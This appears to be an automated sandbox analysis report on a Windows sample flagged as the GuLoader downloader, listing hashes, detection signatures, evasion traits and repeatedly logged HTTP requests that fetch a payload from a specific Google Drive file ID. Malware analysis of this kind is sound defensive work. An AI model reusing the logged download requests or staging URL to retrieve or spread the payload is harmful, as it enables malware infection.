Windows Analysis Report
nRNzqQOQwk.exe

Overview

General Information

Sample name: nRNzqQOQwk.exe
Analysis ID: 1587595
MD5: c616c105a117d63de2b4f818c8fdd3e0
SHA1: fe7d7c8863a5f71e02b2b5b76e1a8f506b08dba7
SHA256: a180642558a07876a9a047217ef75504a4fe7e1f02e22e1f19ffba8d33e6790a

Detection

GuLoader
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • nRNzqQOQwk.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\nRNzqQOQwk.exe" MD5: C616C105A117D63DE2B4F818C8FDD3E0)
    • nRNzqQOQwk.exe (PID: 8016 cmdline: "C:\Users\user\Desktop\nRNzqQOQwk.exe" MD5: C616C105A117D63DE2B4F818C8FDD3E0)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.16901286727.0000000002BAB000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.13419006132.00000000041CB000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:32:07.968991+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49746 | 142.250.190.110 | 443 | TCP

AV Detection

Source: nRNzqQOQwk.exe, Avira: detected
Source: nRNzqQOQwk.exe, Virustotal: Detection: 67%
Source: nRNzqQOQwk.exe, ReversingLabs: Detection: 70%
Source: nRNzqQOQwk.exe, Joe Sandbox ML: detected
Source: nRNzqQOQwk.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49746 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49747 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49748 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49751 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49773 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49774 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49783 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.97:443 -> 192.168.11.20:49797 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.190.110:443 -> 192.168.11.20:49810 version: TLS 1.2
Source: nRNzqQOQwk.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: mshtml.pdbUGP source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\nRNzqQOQwk.exe, Code function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
Source: C:\Users\user\Desktop\nRNzqQOQwk.exe, Code function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
Source: C:\Users\user\Desktop\nRNzqQOQwk.exe, Code function: 0_2_0040270B FindFirstFileA,0_2_0040270B
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49746 -> 142.250.190.110:443
Source: global traffic, HTTP traffic detected:
    GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
Source: global traffic, HTTP traffic detected:
    GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
